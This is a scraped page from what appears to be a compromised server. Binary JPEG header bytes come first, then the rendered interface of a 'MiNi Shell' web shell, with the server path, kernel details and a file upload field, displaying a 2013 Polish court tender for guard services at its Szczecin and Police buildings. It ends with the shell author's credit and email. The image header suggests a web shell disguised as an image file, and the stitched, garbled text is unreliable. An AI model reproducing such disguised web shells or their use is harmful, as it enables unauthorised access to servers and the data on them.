JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/240219-N-2013.html

<p class="kh_header"><b>Szczecin: Ochrona obiektów i mienia Sądu Rejonowego Szczecin - Prawobrzeże
 i Zachód w Szczecinie pl. Żołnierza Polskiego 16 
i w budynku w Policach przy ul. Korczaka 13/15</b><br>
<b>Numer ogłoszenia: 240219 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy Szczecin - Prawobrzeże i Zachód w Szczecinie , pl. Żołnierza Polskiego 16, 70-551 Szczecin, woj. zachodniopomorskie, tel. 091 4603577, faks 091 4603578.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin-pz.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektów i mienia Sądu Rejonowego Szczecin - Prawobrzeże
 i Zachód w Szczecinie pl. Żołnierza Polskiego 16 
i w budynku w Policach przy ul. Korczaka 13/15.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest ochrona osób, obiektów i mienia Sądu Rejonowego Szczecin - Prawobrzeże i Zachód w Szczecinie, Pl. Żołnierza Polskiego 16, w Policach, ul. Korczaka 13/15.
1A.Bezpośrednia ochrona fizyczna osób, obiektu i mienia Sądu w Szczecinie przy Pl. Żołnierza Polskiego 16. 
Ochrona będzie odbywała się poprzez:
1.	całodobową ochronę fizyczną obiektu i mienia sądu (jeden pracownik ochrony całodobowo we wszystkie dni tygodnia oraz dodatkowo trzech pracowników ochrony w poniedziałki w godzinach od 700 do 1800 i pozostałe dni robocze od wtorku do piątku w godzinach 700 do 1600,
2.	pracownicy ochrony powinni posiadać, co najmniej licencje pierwszego stopnia w zakresie prowadzenia ochrony fizycznej. Zamawiający dopuszcza maximum 2 pracowników ochrony bez licencji pierwszego stopnia (do obsługi szatni oraz urządzenia do przeglądania bagażu),
3.	strzeżenia mienia znajdującego się w chronionym obiekcie celem zabezpieczenia go przed próbami dewastacji, uszkodzenia, rabunku bądź kradzieży - włamania z zewnątrz jak i wewnątrz ochranianego budynku,
4.	ochrony, w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na terenie chronionego budynku,
5.	powiadamiania odpowiednich służb o powstających zagrożeniach w chronionym budynku, podejmowanie działań interwencyjnych w przypadku stwierdzenia zakłóceń porządku na terenie chronionego obiektu,
6.	dokonywanie obchodu budynku co najmniej dwa razy w godzinach nocnych zwracając szczególną uwagę na zakręcone krany i zawory (zabezpieczenie pomieszczeń przed zalaniem),
7.	po godzinach urzędowania Sądu monitorowanie przepływu osób w chronionym obiekcie, udostępnianie pomieszczeń w budynku osobą upoważnionym do wejścia na obiekt,
8.	sprawowanie kontroli nad wynoszonymi z chronionego obiektu sprzętem elektronicznym, informatycznym i innymi wartościowymi materiałami,
9.	ochrona samochodów znajdujących się na wewnętrznych podwórzach sądu,
10.	zapalanie i gaszenie świateł nocnych zewnętrznych i wewnątrz obiektu w zależności od pory roku,
11.	gaszenie świateł wewnątrz budynku w trakcie przeprowadzanego obchodu po godzinach pracy sądu w przypadku gdy nie ma już pracowników,
12.	 sprawdzanie czy nie zostały naruszone w jakiś sposób drzwi, okna, kraty, bramy wjazdowe, kłódki,
13.	udostępnianie pomieszczeń sądu w dni wolne od pracy na podstawie zgłoszenia Kierownika Oddziału Gospodarczego Sądu, lub Kierownika Oddziału Administracyjnego Sądu,
14.	pełna znajomość topografii chronionego obiektu - rozkładu pomieszczeń, dróg ewakuacyjnych itp.,
15.	prawidłowe reagowanie na mogące wystąpić sytuacje nagłe, awaryjne związane z istniejącymi w chronionym obiekcie instalacjami,
16.	powiadamianie wskazanego pracownika sądu oraz właściwych służb w przypadku stwierdzenia w chronionym obiekcie awarii, włamania lub pożaru oraz podjęcie podstawowych działań zabezpieczających,
17.	prowadzenie książki pełnienia służby, w której odnotowuje się przebieg służby, godziny rozpoczęcia i zakończenia służby przez każdego pracownika,
18.	niedopuszczanie do wstępu osób nieuprawnionych na teren chroniony oraz wzywanie do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu względnie zakłócania porządku,
19.	gospodarowanie kluczami do wszystkich pomieszczeń,
20.	prowadzenie szatni dla interesantów sądu,
21.	oferent na własny koszt wyposaży pracowników ochrony w jednolite mundury z emblematami oferenta, potrzebny sprzęt specjalnego przeznaczenia oraz środki łączności,
22.	oferent na własny koszt wyposaży pracowników ochrony w przenośny wykrywacz metali,
23.	oferent ponosi odpowiedzialność za szkodę wynikającą z niewykonania, nienależytego    wykonania lub wykonania z nienależytą starannością obowiązków w zakresie ochrony na zasadach określonych w kodeksie cywilnym,
24.	pracownicy ochrony w czasie pełnienia służby będą stosować się do poleceń osób         wskazanych przez Zleceniodawcę,
25.	pracownicy ochrony przewidziani do realizacji przedmiotowego zamówienia powinni       posiadać umiejętność obsługi komputera, centralek ppoż i elektronicznego systemu przeciwwłamaniowego.
2A. Bezpośrednia ochrona fizyczna osób, obiektu i mienia wraz z zabezpieczeniem technicznym Sądu w Policach ul. Korczaka 13/15.
Ochrona będzie odbywała się poprzez:
1.Ochronę fizyczną obiektu i mienia sądu (jeden pracownik ochrony w poniedziałki w godzinach od 730 do 1800 i pozostałe dni robocze od wtorku do piątku w godzinach 730 do 16.00. W pozostałych godzinach doby i dni wolne od pracy nadzór elektroniczny, w tym z uwzględnieniem podglądu kamer zainstalowanych w budynku. Podgląd zdalnego monitoringu kamer realizowany w budynku sądu w Szczecinie, pl. Żołnierza Polskiego 16. 

2.pracownicy ochrony powinni posiadać, co najmniej licencje pierwszego stopnia w zakresie prowadzenia ochrony fizycznej, 
3.strzeżenia mienia znajdującego się w chronionym obiekcie celem zabezpieczenia go przed próbami dewastacji, uszkodzenia, rabunku bądź kradzieży - włamania z zewnątrz jak i wewnątrz ochranianego budynku,
4.ochrony, w sytuacjach szczególnego zagrożenia życia i zdrowia osób przebywających na terenie chronionego budynku,
5.powiadamiania odpowiednich służb o powstających zagrożeniach w chronionym budynku, podejmowanie działań interwencyjnych w przypadku stwierdzenia zakłóceń porządku na terenie chronionego obiektu,
6.dokonywanie obchodu budynku co najmniej dwa razy w godzinach pracy zwracając szczególną uwagę na zakręcone krany i zawory (zabezpieczenie pomieszczeń przed zalaniem),
7.po godzinach urzędowania Sądu załączenie systemów alarmowych,
8.sprawowanie kontroli nad wynoszonymi z chronionego obiektu sprzętem elektronicznym, informatycznym i innymi wartościowymi materiałami,
9.ochrona samochodów znajdujących się na wewnętrznych podwórzach sądu,
10.zapalanie i gaszenie świateł nocnych zewnętrznych i wewnątrz obiektu w zależności od pory roku,
11.sprawdzanie czy nie zostały naruszone w jakiś sposób drzwi, okna, kraty, bramy wjazdowe, kłódki,
12.pełna znajomość topografii chronionego obiektu - rozkładu pomieszczeń, dróg               ewakuacyjnych itp.,
13.prawidłowe reagowanie na mogące wystąpić sytuacje nagłe, awaryjne związane z              istniejącymi w chronionym obiekcie instalacjami,
14.powiadamianie wskazanego pracownika sądu oraz właściwych służb w przypadku      stwierdzenia w chronionym obiekcie awarii, włamania lub pożaru oraz podjęcie podstawowych działań zabezpieczających,
15.prowadzenie książki pełnienia służby, w której odnotowuje się przebieg służby, godziny rozpoczęcia i zakończenia służby przez każdego pracownika,
16.niedopuszczanie do wstępu osób nieuprawnionych na teren chroniony oraz wzywanie do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na terenie chronionego obiektu względnie zakłócania porządku,
17.oferent na własny koszt wyposaży pracowników ochrony w jednolite mundury z emblematami oferenta, potrzebny sprzęt specjalnego przeznaczenia oraz środki łączności, 
18.oferent ponosi odpowiedzialność za szkodę wynikającą z niewykonania, nienależytego    wykonania lub wykonania z nienależytą starannością obowiązków w zakresie ochrony na zasadach określonych w kodeksie cywilnym,
19.pracownicy ochrony w czasie pełnienia służby będą stosować się do poleceń osób         wskazanych przez Zleceniodawcę,
20.pracownicy ochrony przewidziani do realizacji przedmiotowego zamówienia powinni       posiadać umiejętność obsługi komputera, centralek ppoż i elektronicznego systemu przeciwwłamaniowego.

3.Wykonawca będzie świadczyć usługi wyłącznie w oparciu o osoby:
a)  niekarane za przestępstwo umyślne, 
b) posiadające co najmniej licencję I stopnia pracownika ochrony fizycznej - Zamawiający dopuszcza maximum 2 pracowników ochrony bez licencji pierwszego stopnia (do obsługi szatni oraz urządzenia do przeglądania bagażu - dotyczy obiektów Zamawiającego w Szczecinie).
4.Dyżur każdego pracownika ochrony w obiektach przewidzianych do ochrony nie może być dłuższy niż to stanowią obowiązujące przepisy Kodeksu Pracy.
5.Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu do akceptacji imiennej listy osób przewidzianych do realizacji niniejszego zamówienia wraz z informacją o posiadanej licencji, oraz informowania o każdorazowej zmianie osób na tej liście. Zamawiający wymaga, aby lista osób została przedłożona do akceptacji Zamawiającego przed podpisaniem umowy. Wykonawca będzie przekazywał osobie upoważnionej przez Zamawiającego szczegółowy przydział osób na poszczególne obiekty, zgodnie z ustalonymi harmonogramami..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp do 15 % wartości zamówienia podstawowego i polegające na powtórzeniu usług tego samego rodzaju</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony poprzez złożenie aktualnej koncesji Ministra Spraw Wewnętrznych i Administracji wydaną na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. .U. 145 poz.1221 z 2005 r. z późn. zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia; realizowanych w formie bezpośredniej ochrony fizycznej i zabezpieczenia technicznego;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, iż zrealizował lub aktualnie realizuje, co najmniej 1 zamówienie (na podstawie jednej umowy) o charakterze porównywalnym z zakresem niniejszego zamówienia;
-  poprzez zamówienie o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć: ochronę osób i mienia, obiektów w formie bezpośredniej ochrony fizycznej, w obiekcie użyteczności publicznej Skarbu Państwa, jednostek Ministerstwa Sprawiedliwości lub MSWiA o pow. całk. min. 5000 m2 o wartości, co najmniej 130.000,00 zł brutto w skali roku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że dysponuje grupą interwencyjną, która przybędzie do chronionego obiektu do pięciu minut od chwili odebrania sygnału o bezpośrednim zagrożeniu obiektu oraz oświadczy, iż dysponuje stacją monitorowania. Warunek zostanie uznany za spełniony poprzez złożenie oświadczenia 
(na druku ofertowym).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, iż dysponuje pracownikami realizującymi bezpośrednią ochronę fizyczną, posiadającymi, co najmniej licencję I stopnia (Zamawiający dopuszcza maximum 2 pracowników ochrony bez licencji pierwszego stopnia dotyczy obiektów Zamawiającego w Szczecinie).Warunek zostanie uznany za spełniony poprzez złożenie oświadczenia (na druku ofertowym).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, iż posiada aktualne ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min 1.000.000,00zł;
Warunek zostanie uznany za spełniony poprzez złożenie oświadczenia (na druku ofertowym). Wykonawca, którego oferta zostanie uznana za najkorzystniejszą najpóźniej w dniu podpisania umowy okaże Zamawiającemu do wglądu oryginał polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający żąda wskazania przez Wykonawcę w wykazie głównych usług- usług określonych (i w ilości wskazanej) w SIWZ w rozdziale IV pkt 1 ppkt 1.2. Zamawiający nie wymaga informacji o usługach niewykonanych lub wykonanych nienależycie.
Poprzez zamówienie usługę o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć: ochronę osób i mienia, obiektów w formie bezpośredniej ochrony fizycznej, w obiekcie użyteczności publicznej Skarbu Państwa, jednostek Ministerstwa Sprawiedliwości lub MSWiA o pow. całk. min. 5000 m2 o wartości, co najmniej 130.000,00 zł brutto w skali roku.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca zobowiązany jest dostarczyć:
- ważny certyfikat ISO 9001-2000 w zakresie usług ochrony;
- poświadczenie bezpieczeństwa przemysłowego - co najmniej III stopnia;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.1.	Wypełniony formularz ofertowy [ wg załącznika nr 1 do SIWZ];
1.2.	Dokumenty wymienione w rozdz. V SIWZ.
1.3.	 dokument ustanawiający pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego (np. umowa spółki cywilnej, umowa konsorcjum) - dotyczy jedynie Wykonawców wspólnie ubiegających się o udzielenie przedmiotowego zamówienia publicznego (spółka cywilna, konsorcjum);
1.4.	pełnomocnictwo, jedynie w przypadku podpisywania oferty lub poświadczania za zgodność z oryginałem kopii dokumentów przez osob(ę)y nie wymienion(ą)e w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy;
1.5.	dowód, w szczególności pisemne zobowiązanie podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - dotyczy jedynie Wykonawcy, który polega na zasobach podmiotów trzecich, Pełnomocnictwo o ile ofertę w imieniu Wykonawcy składa Pełnomocnik;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin-pz.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy Szczecin- Prawobrzeże i Zachód w Szczecinie, Pl. Żołnierza Polskiego 16, 70-551 Szczecin, w pok. 1 /Oddział Gospodarczy/budynek główny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.11.2013 godzina 11:00, miejsce: Sąd Rejonowy Szczecin- Prawobrzeże i Zachód w Szczecinie, Pl. Żołnierza Polskiego 16, 70-551 Szczecin, w pok. 1 /Oddział Gospodarczy/budynek główny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com